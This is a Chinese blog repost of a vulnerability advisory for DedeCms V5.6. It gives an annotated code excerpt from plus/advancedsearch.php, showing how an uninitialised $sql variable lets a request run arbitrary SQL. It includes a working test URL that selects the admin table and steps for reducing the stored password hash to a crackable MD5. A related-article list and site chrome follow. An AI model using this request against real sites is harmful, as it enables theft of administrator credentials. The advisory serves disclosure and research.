DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

最新推荐文章于 2023-01-08 16:45:46 发布
最新推荐文章于 2023-01-08 16:45:46 发布
阅读量460 收藏
点赞数
文章标签: php
漏洞版本:
DedeCms V5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。

plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞

if($mid == 0)  //必须绕过,By:俺是农村的。
{
        showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
        exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from #@__advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo))   //囧啊,绕过有难度,By:俺是农村的。
{
        showmsg('自定义搜索模型不存在','-1');   By:小翔
        exit();
}
$template = $searchinfo['template'] != '' ?  $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql))         //人品问题,成功绕过! QQ:332876777
{
        ..............
}else{
        $sql = urldecode($sql);
        $query = $sql;
}

$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............

$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);

.............
<* 参考
http://www.t00ls.net/
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
    2.  
    3. 密码是32MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16MD5
weixin_34381687
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DeDecms任意SQL语句执行漏洞
网站守护中心
04-13 1519
DeDecms任意SQL语句执行漏洞描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:由于dedecmsv5.6的全局机制可以任意给其赋值,而且高级搜索功能/plus/advancedsearch.php中的$sql变量未初始化,导致高级搜索功能可以绕过模板定义直接执行任意SQL语句DeDecms
织梦系统中“自定义搜索模型不存在”的解决方法
北极光的博客
12-11 3434
搜索了一下关于自定义搜索模型不存在这个问题 重新整理下: 1.mysql 数据库在5.0版本以上 2. 自定义搜索表dede_advancedsearch 这个表的结构把256 改成255  3.还有就是搜索的表单里一定要制定模型id 最好用自动生成的 具体在 核心--频道模型--内容模型管理--选择你要用到的模型的自定义搜索。 注意你要是第一次用搜索没在第二步设置也可能出现自定义搜索模
dede在高级搜索页面advancedsearch.php调用自定义字段
zhnwhsb的博客
10-04 2053
做了advancedsearch搜索页面,却发现自定义的模型里面的自定义字段不显示? 如下: 如果通过“内容模型管理 > 自定义搜索”搜索的结果页如果要显示自定义字段,可使用以下方法: 1。修改puls/advancedsearch.php文件,找到代码 } else { $query = "SELECT main.id AS aid,main.*,main.de
高级搜索的使用advancedsearch.htm
hyt48079287的专栏
06-30 5973
1.代码的获取很简单,直接在模板
织梦dedecmsadvancedsearch精确查询,根据自定义字段查询,查询结果页面无法调用自定义字段,头部,尾部,解决办法
_________blcx的专栏
07-10 2479
(一)根据自定义字段,精确查询 后台 - 核心 - 内容模型管理 根据你添加字段的频道,点击右边红色框内按钮,进入 此地以 自定义字段 测试1 测试2 为例,然后粘贴到你需要搜索的模板中,样式自行调整 搜索后发现,系统I自带的页面非常丑,想用自己的模板怎么办? 找到plus/advancedsearch.php 找到末尾如下代码 if(
基于PHPDedeCMS V5.6 正式最终稳定版.zip
07-18
基于PHPDedeCMS V5.6 正式最终稳定版.zip
PHP实例开发源码—DedeCMS V5.6 正式最终稳定版.zip
11-22
PHP实例开发源码—DedeCMS V5.6 正式最终稳定版.zip
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
06-15
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
基于PHP的58安卓网dedecms模板php版v1.0源码.zip
07-22
基于PHP的58安卓网dedecms模板php版v1.0源码.zip
基于PHPdedecms5.6仿WordPressblog模板程序打包UTF8源码.zip
08-13
基于PHPdedecms5.6仿WordPressblog模板程序打包UTF8源码.zip
网安(1)——命令行执行漏洞sql执行漏洞
Simonqwer的博客
01-08 273
网络安全入门小学生写作
dede常见漏洞以及解决方法
IT技术宅-北方的刀郎
03-21 1361
dede常见漏洞以及解决方法2013-09-06 09:27:59     我来说两句       作者:尛雷收藏    我要投稿dede的漏洞公认的多,接手这个网站也接触了不少,现在就把几种接触到的或者了解到的漏洞记录下来,让大家可以提高警惕,防止网站被攻击。1.dede dialog目录下的配置文件漏洞   如果有能力的同学最好好好研究下这个目录下的文件,漏洞太多了,先只说我遇到的一处在inc
advancedsearch.php织梦高级自定义模型字段无法调用解决方案
weixin_34248849的博客
05-21 262
advancedsearch.php织梦dedecms 高级自定义模型字段无法调用解决方案 ,具体步骤如下:1 打开修改puls/advancedsearch.php文件,找到复制代码(不同版本可能有所差别)。 $query = "SELECT addon.*, arctype.* FROM $addontable addon LEFT JOIN arcty...
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7881
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞
weixin_34185512的博客
09-13 5624
本文讲的是如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞,今天我将使用打包的套件攻击工具对bwapp应用程序进行模糊测试,手动执行此测试是一个耗时的时间,可能对任何一个渗透性测试的安全人员来说都是无聊的过程。 模糊测试在软件测试中起着至关重要的作用,它是一种工具,用于通过将一组称为模糊的部分地址输入注入到要测试的应用程序的程序中来...
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5271
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
PHP任意文件上传漏洞
yanyanphp的专栏
04-03 1565
 安全研究人员今天发布了一个中危漏洞——PHP任意文件上传漏洞(CVE-2015-2348)。 在上传文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文件,这确实会导致其他安全问题。并且在这种情况下,在你自己的文件中检查漏洞很不现实,因为这个漏洞可以绕过你对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等的检查,所以仅仅依靠这些检查是救不了你的。
dedecms v56 plus/search.php 注入漏洞
最新发布
09-22
dedecms v56 plus 是一个开源的内容管理系统,其中的 search.php 文件存在注入漏洞。 这个注入漏洞允许攻击者通过构造恶意的请求,在 search.php 页面中执行恶意的 SQL 代码。攻击者可以利用这个漏洞获取敏感的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值